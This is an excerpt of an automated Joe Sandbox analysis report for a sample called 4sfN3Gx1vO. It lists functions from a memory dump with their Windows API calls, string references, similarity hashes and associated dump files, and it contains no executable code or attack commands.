Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 4a4ffae62088c53692ce58d9f1487e89508639edc2905e7017118c0ec1cd82db
Instruction ID: d45ad4c648fb10770a3f34014536dc83df1b13599ed28869aad4c22a23baeec2
Opcode Fuzzy Hash: 4a4ffae62088c53692ce58d9f1487e89508639edc2905e7017118c0ec1cd82db
Instruction Fuzzy Hash: 8B01C03A805205BBCB215BA5EC09AAB7F79FF82731F100219F925921D0DF718905D7B0

Function 0051600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0051604C
GetStockObject.GDI32(00000011), ref: 00516060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0051606A

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 30323eebe2589afb3f6ad0efc8e340db9e3cd52195892856385bb894bc6ba083
Instruction ID: b107be61bab182dbec4d44bf95da99212bad452a61abb8ec84958de889274cc6
Opcode Fuzzy Hash: 30323eebe2589afb3f6ad0efc8e340db9e3cd52195892856385bb894bc6ba083
Instruction Fuzzy Hash: A611AD72501508BFEF129FA48C48EEABFA9FF1D3A4F000206FA0556110C7329CA0EBA1

Function 00533B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00533B56

Part of subcall function 00533AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00533AD2
Part of subcall function 00533AA3: ___AdjustPointer.LIBCMT ref: 00533AED

_UnwindNestedFrames.LIBCMT ref: 00533B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00533B7C
CallCatchBlock.LIBVCRUNTIME ref: 00533BA4

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: f06acc09e4593976fed23c5dc7da80649af29af9ef4ed75e1183013d4221a169
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: CC01E932100149BBDF125E95CC4AEEB7F69FF98754F044014FE4866121C736E961DBA0

Function 00543073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,005113C6,00000000,00000000,?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue), ref: 005430A5
GetLastError.KERNEL32(?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue,005B2290,FlsSetValue,00000000,00000364,?,00542E46), ref: 005430B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0054301A,005113C6,00000000,00000000,00000000,?,0054328B,00000006,FlsSetValue,005B2290,FlsSetValue,00000000), ref: 005430BF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: 44481e7845afbf6406d13e7582b9270bbef0e4905ff1adf5a953710904a22a5a
Instruction ID: f2fed4ac56fc8efa5cff5c1b14f288658ecd53835b938a4d63b369a4f0a037f9
Opcode Fuzzy Hash: 44481e7845afbf6406d13e7582b9270bbef0e4905ff1adf5a953710904a22a5a
Instruction Fuzzy Hash: B4012B36301622ABCB314B789C4CA977FD8BF16B65B200720F90DE7160D721DD09C6E0

Function 00577464 Relevance: 6.1, APIs: 4, Instructions: 51registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000), ref: 0057747F
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00577497
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 005774AC
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 005774CA

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 2196ade24e098f3051b76bb2e59be5ba11d3f95ddb171f1d1f0995e41220346c
Instruction ID: b428db24a8e2cfd7b177b09b814ab7e5dd40fe082681dfb19efc57fad476ba2b
Opcode Fuzzy Hash: 2196ade24e098f3051b76bb2e59be5ba11d3f95ddb171f1d1f0995e41220346c
Instruction Fuzzy Hash: 2D115EB52053199BEB208F24FC09F927FFDFB08B04F10C969A66AD6151D7B0E908EB50

Function 0057B0A8 Relevance: 6.0, APIs: 4, Instructions: 50sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0C4
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0E9
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B0F3
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0057ACD3,?,00008000), ref: 0057B126

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: b169ba9a6fa6bb47b6f596badd9c1977d522f5af8ac7ca63f8567c3d9dd268cc
Instruction ID: 526469fef58ce4f13997d9a2c1d5ba6b1fd7f46e53ea40b979a20e7d06872028
Opcode Fuzzy Hash: b169ba9a6fa6bb47b6f596badd9c1977d522f5af8ac7ca63f8567c3d9dd268cc
Instruction Fuzzy Hash: 75117930E01529E7DF00AFE4E9A8BEEBF78FF5A311F008486D945B2181CB305655EB51

Function 00572DA7 Relevance: 6.0, APIs: 4, Instructions: 34threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00572DC5
GetWindowThreadProcessId.USER32(?,00000000), ref: 00572DD6
GetCurrentThreadId.KERNEL32 ref: 00572DDD
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00572DE4

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: 344b7d775e18aee94c14438d19be04ade4602f15936627034996f612069c5f11
Instruction ID: 95905d093804b29c87b2925ec2f55ab28fb7749f35a8b20dd49f0099a903da29
Opcode Fuzzy Hash: 344b7d775e18aee94c14438d19be04ade4602f15936627034996f612069c5f11
Instruction Fuzzy Hash: 38E092B16012347BD7305B76AC0DFEB3E6CFF63BA1F004015F109D20809AA0C845E6B0

Function 005A8863 Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00529639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00529693
Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296A2
Part of subcall function 00529639: BeginPath.GDI32(?), ref: 005296B9
Part of subcall function 00529639: SelectObject.GDI32(?,00000000), ref: 005296E2

MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 005A8887
LineTo.GDI32(?,?,?), ref: 005A8894
EndPath.GDI32(?), ref: 005A88A4
StrokePath.GDI32(?), ref: 005A88B2

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
String ID:
API String ID: 1539411459-0
Opcode ID: 86e18fa264ac55a03956f98fa905e907e81f48d66c16808471dbced522369982
Instruction ID: 90fb1ba7bc6ae5c7aaccbfeb9de6460cc5d76bdcd182896492d68d60d2a58c1b
Opcode Fuzzy Hash: 86e18fa264ac55a03956f98fa905e907e81f48d66c16808471dbced522369982
Instruction Fuzzy Hash: ABF03A36045659BADB125F94AC0DFDE3E59BF27310F448000FA11650E2CB795515EBA9

Function 005298B0 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 005298CC
SetTextColor.GDI32(?,?), ref: 005298D6
SetBkMode.GDI32(?,00000001), ref: 005298E9
GetStockObject.GDI32(00000005), ref: 005298F1

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Color$ModeObjectStockText
String ID:
API String ID: 4037423528-0
Opcode ID: fdf6603537d52c9d4adb0155221fe6a5cb8cc3c0d570d87573f395080bf49304
Instruction ID: babda23092f530fcf023f160b2149b06ff6ffa12fd385980bdd04a0b603c7173
Opcode Fuzzy Hash: fdf6603537d52c9d4adb0155221fe6a5cb8cc3c0d570d87573f395080bf49304
Instruction Fuzzy Hash: 77E06D31644284ABDB215B74BC09BE83F60FB27336F048219F6FA581E1C7724684EB10

Function 0057162B Relevance: 6.0, APIs: 4, Instructions: 22threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00571634
OpenThreadToken.ADVAPI32(00000000,?,?,?,005711D9), ref: 0057163B
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,005711D9), ref: 00571648
OpenProcessToken.ADVAPI32(00000000,?,?,?,005711D9), ref: 0057164F

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 6d78daf8af01a9f0b2d155c7cc239e2065791bb06a459dc144e30e1677b3d84a
Instruction ID: 9fd6a7abfb0923c10368a160921ec55014196553daf74aa5e51fb240e99b5b65
Opcode Fuzzy Hash: 6d78daf8af01a9f0b2d155c7cc239e2065791bb06a459dc144e30e1677b3d84a
Instruction Fuzzy Hash: 70E08635601211DBD7201FA5AD0DB4B3F7CBF66791F148808F245C9080D6344548E754

Function 0056D858 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0056D858
GetDC.USER32(00000000), ref: 0056D862
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0056D882
ReleaseDC.USER32(?), ref: 0056D8A3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: fe3f31decb965d1eff72b2794d78ec19c2547cf145b65ae4249fd8c78f015923
Instruction ID: ca8919bc23010366900ac9e3378c651b0e0ab707e0499b170370e9ed39fb7596
Opcode Fuzzy Hash: fe3f31decb965d1eff72b2794d78ec19c2547cf145b65ae4249fd8c78f015923
Instruction Fuzzy Hash: 69E01AB4800205DFCB419FA4D80C66DBFB1FB19310F108409E806E7350CB388945AF50

Function 0056D86C Relevance: 6.0, APIs: 4, Instructions: 18COMMON

Download Yara Rule

APIs

GetDesktopWindow.USER32 ref: 0056D86C
GetDC.USER32(00000000), ref: 0056D876
GetDeviceCaps.GDI32(00000000,0000000C), ref: 0056D882
ReleaseDC.USER32(?), ref: 0056D8A3

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: CapsDesktopDeviceReleaseWindow
String ID:
API String ID: 2889604237-0
Opcode ID: 587933b3dbc702fa7ea6e77ed2ba42330fd5dfb5924db8b132cafcaaa00c6018
Instruction ID: 967b2f4171f1099f455d179a3d3f2215e27ba0317e127c4cc6dd779dd11b1383
Opcode Fuzzy Hash: 587933b3dbc702fa7ea6e77ed2ba42330fd5dfb5924db8b132cafcaaa00c6018
Instruction Fuzzy Hash: 78E012B4800204EFCB41AFA4D80C66EBFB1BB19310B108408E80AE7360CB38990AAF50

Function 00584D87 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 230shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00517620: _wcslen.LIBCMT ref: 00517625

WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00584ED4

Strings

*, xrefs: 00584E10
LPT, xrefs: 00584DFB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: Connection_wcslen
String ID: *$LPT
API String ID: 1725874428-3443410124
Opcode ID: 50cdfcd0c80f2875b9d9fafd9d0b68a234cc6281d139b57edf0632c7582f4257
Instruction ID: ec4d1fe4e7100715e07138861d22498cf32366a0cc2e57413c7249f885553b84
Opcode Fuzzy Hash: 50cdfcd0c80f2875b9d9fafd9d0b68a234cc6281d139b57edf0632c7582f4257
Instruction Fuzzy Hash: BB914A75A002059FDB14EF58C484AAABFB5BF48304F198099ED0AAB362D731ED85CF91

Function 0053E27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 0053E30D

Strings

pow, xrefs: 0053E2E5, 0053E302

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: ErrorHandling__start
String ID: pow
API String ID: 3213639722-2276729525
Opcode ID: a521351e38fd914cd9748babc6443914a3f291837160b753a9f2b414ba0853ca
Instruction ID: 3c105a0531dd9e4f1d239972786d0b5c7827b106ddec0575143a0e72a3a4b853
Opcode Fuzzy Hash: a521351e38fd914cd9748babc6443914a3f291837160b753a9f2b414ba0853ca
Instruction Fuzzy Hash: 5E515971E1C20A96CB157724C9473FA3FE8FB54744F208E98E095832E9EB309C95AA46

Function 00597771 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0056569E,00000000,?,005ACC08,?,00000000,00000000), ref: 005978DD

Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A

CharUpperBuffW.USER32(0056569E,00000000,?,005ACC08,00000000,?,00000000,00000000), ref: 0059783B

Strings

<s], xrefs: 005977C8

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: BuffCharUpper$_wcslen
String ID: <s]
API String ID: 3544283678-3287859866
Opcode ID: c4a76884b88d05f07e957f978f1b1fa8f9ef946f2e6bf42aa1d9ed41a23ea3ce
Instruction ID: f78ab4f2a3c13ab3eb41a6b18f90cb29e4d93f20758be01d84cf36e5052db489
Opcode Fuzzy Hash: c4a76884b88d05f07e957f978f1b1fa8f9ef946f2e6bf42aa1d9ed41a23ea3ce
Instruction Fuzzy Hash: C9616B7292411AAADF04EBA4CC95DFDBB78FF58300F540926E542A3191EF306A85DBA0

Function 0052E187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON

Download Yara Rule

Strings

#, xrefs: 0052E1B1

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: d49aea0f79622708839d8c7b551583b72b66cad7436c0c37abe0428c25b3bd83
Instruction ID: 66adfff15f52614cec2f1f134505b049b2068563e8ecacdaee075e01aa8943b8
Opcode Fuzzy Hash: d49aea0f79622708839d8c7b551583b72b66cad7436c0c37abe0428c25b3bd83
Instruction Fuzzy Hash: A1513339502296DFDF15DF28D086AFA7FA8FF66310F644055E8929B2C0D6349D82CBA0

Function 0052F291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 0052F2A2
GlobalMemoryStatusEx.KERNEL32(?), ref: 0052F2BB

Strings

@, xrefs: 0052F2AF

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: c74dde67e1f6d21e205f5e19fd96fb59d69fa193dacbb454621c85b518957ae6
Instruction ID: c7a2995c9ab9ec5f6a5ad5f1cdfd9c427da7dc9de0f0fd6f0e4bc561255378ce
Opcode Fuzzy Hash: c74dde67e1f6d21e205f5e19fd96fb59d69fa193dacbb454621c85b518957ae6
Instruction Fuzzy Hash: 95514971408B499BE320AF14DC8ABABBBF8FFD9300F81485DF1D941195EB318569CB66

Function 00595745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 005957E0
_wcslen.LIBCMT ref: 005957EC

Strings

CALLARGARRAY, xrefs: 005957E6, 005957EB

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd

Similarity

API ID: BuffCharUpper_wcslen
String ID: CALLARGARRAY
API String ID: 157775604-1150593374
Opcode ID: 92714ac8121d4e3579a21eab9b2995cc6c0dae05a0094faa19f3c06a8767730d
Instruction ID: 1c137534ec4c76d0c473b9da2367f8f55f118cdcbbcc352f0b521fcfa437f5d1
Opcode Fuzzy Hash: 92714ac8121d4e3579a21eab9b2995cc6c0dae05a0094faa19f3c06a8767730d
Instruction Fuzzy Hash: 42418071A0010A9FCF15DFA9D8899EEBFF5FF99320F244069E505A7291E7309D91CB90

Function 0058D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0058D130
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0058D13A

Strings

|, xrefs: 0058D10B

Memory Dump Source

Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true

Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
